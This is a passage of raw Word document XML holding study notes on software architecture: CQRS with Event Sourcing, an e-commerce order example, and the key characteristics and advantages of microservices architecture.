          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Event Sourcing</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are often used together to provide powerful solutions to complex problems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4477949C"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CQRS</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> focuses on separating the read and write models to allow for independent optimization and scalability, while </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Event Sourcing</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> focuses on persisting changes as events rather than storing the current state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8D0BC6"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When combined, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CQRS</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> handles the query and command sides of your system, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Event Sourcing</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> stores the changes to state as events, providing a robust, scalable, and auditable system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5009825F"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Example Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DB4F61"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E-commerce Order System</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5381000C" w14:textId="77777777" w:rsidR="00312742" w:rsidRPr="00FA65E9" w:rsidRDefault="00312742" w:rsidP="00FA65E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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In a large e-commerce platform, an </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>order</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> might go through multiple stages (e.g., placed, processed, shipped). Using </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Event Sourcing</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, each change in the order’s status is saved as an event (OrderPlaced, OrderShipped, etc.), and the state of the order can be rebuilt by replaying those events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EBB4F6"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CQRS</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be used to optimize the reading of order data. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>query model</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> may allow the system to perform complex queries on orders (e.g., order status, total revenue), while the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>command model</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> will handle order creation, update, or cancellation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8A0AB8" w14:textId="77777777" w:rsidR="00312742" w:rsidRPr="00FA65E9" w:rsidRDefault="00000000" w:rsidP="00FA65E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E3DACE1">
          <v:rect id="_x0000_i2873" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CA2E61" w14:textId="77777777" w:rsidR="00312742" w:rsidRPr="00FA65E9" w:rsidRDefault="00312742" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C620AB1"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CQRS</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is useful when there’s a need to </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>separate read and write operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> due to performance or scalability concerns, or when the system has complex business logic or workflows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6840FEC4"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Event Sourcing</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is useful when </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>tracking all state changes</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is important (e.g., audit logs, recovering past states) or when working with </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>event-driven systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207A9692" w14:textId="77777777" w:rsidR="00312742" w:rsidRPr="00FA65E9" w:rsidRDefault="00312742" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Both patterns are not necessary for every application, but they are invaluable in </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>complex systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>auditability</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>distributed architectures</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are critical. They provide a clear advantage in systems that need to track, replay, or scale events and states independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFA3A30" w14:textId="1492B232" w:rsidR="00115965" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0011596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2370A4C">
          <v:rect id="_x0000_i2874" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D64C8A0" w14:textId="76DE815E" w:rsidR="001659D4" w:rsidRPr="00CE4B95" w:rsidRDefault="00AF4871">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="689" w:name="_Toc196308169"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Microservices architecture</w:t>
      </w:r>
      <w:r w:rsidR="001659D4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="689"/>
    </w:p>
    <w:p w14:paraId="7D5469EB" w14:textId="3A3D5E75" w:rsidR="00312742" w:rsidRPr="00FA65E9" w:rsidRDefault="00312742" w:rsidP="00FA65E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Microservices architecture</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an approach to software development where a system is built as a collection of small, loosely coupled services, each of which is responsible for a specific business function. These services are independently deployable, have their own data storage, and communicate with each other over standard protocols like HTTP or messaging queues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7064AB"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 xml:space="preserve">Here’s a detailed explanation of </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Microservices Architecture</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D2B72F"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Key Characteristics of Microservices Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CA4F5B"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Independent Services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76532242"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A microservices architecture divides an application into multiple small services, each of which focuses on a specific business domain. These services are independent and can be developed, deployed, and scaled individually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5633C3"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Autonomous Deployment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0CAE5B"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Each microservice can be independently deployed and updated. This means that new features or bug fixes can be added to one service without affecting the other services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D89D644"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Decentralized Data Management:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEDB642"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Each microservice typically has its own database (known as </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Database per Service</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>). This avoids the bottleneck of a shared database, allowing each service to manage its data in a way that fits its needs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6975EDB9"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ommunication Between Services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2DB3D6"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Microservices communicate with each other via lightweight protocols like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RESTful APIs</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>gRPC</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message brokers</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., Kafka, RabbitMQ). Each service exposes an API or a message queue to send and receive information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30590C95"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Domain-Driven Design (DDD):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63448313"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Microservices are often designed around business domains using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Domain-Driven Design (DDD)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> principles. Each service is a reflection of a specific business functionality, such as "order processing" or "payment."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56654CAA"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Resilience and Fault Tolerance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073AEAA8"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Microservices are designed to handle failures gracefully. If one service fails, it doesn't necessarily bring down the whole system. Techniques like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>circuit breakers</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>retry mechanisms</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are used to handle failures and improve reliability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A48DAC9"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Scalability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FE5438"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Since each microservice is independent, individual services can be scaled based on demand. This enables the application to handle high loads in specific parts of the system without overloading the entire infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F1C448"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Technology Agnostic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2003D321"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Each microservice can be developed using the technology stack that best suits its needs. For instance, one microservice can be written in Java, while another can be written in Python or Go. This flexibility allows teams to choose the right tools for the job.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC74BB7"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3450E7B5">
          <v:rect id="_x0000_i2875" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B08431"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Advantages of Microservices Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCC4E67"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Scalability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E88FFA"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Microservices allow you to scale individual services as needed. For example, if a payment service is under heavy load, you can scale just that service, rather than scaling the entire application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE81307"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Faster Time to Market:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052EF001"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Because each service is independent and smaller in scope, teams can work on different services concurrently. This accelerates development and leads to faster delivery of new features.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B9FE99"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Independent Deployments:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E69222E"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Microservices enable </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>continuous delivery</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because each service can be deployed independently. This reduces deployment risks and allows you to update services without affecting the whole system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4250F615"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Improved Fault Isolation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FD6663"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Since services are decoupled, a failure in one service does not directly affect others. The system is more resilient, and failures are easier to isolate and fix.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324DA6E1"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Technology Flexibility:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6807C114"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Developers can choose different technologies for different services, allowing them to use the best tool for the job. For instance, a real-time chat service might be better implemented using WebSockets, while a report generation service could be built using a heavy-duty analytics framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C871714"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Easier Maintenance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358D0294"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Smaller, focused codebases are easier to maintain and understand. Teams can concentrate on specific business areas, and the system is less complex overall.</w:t>
      </w:r>
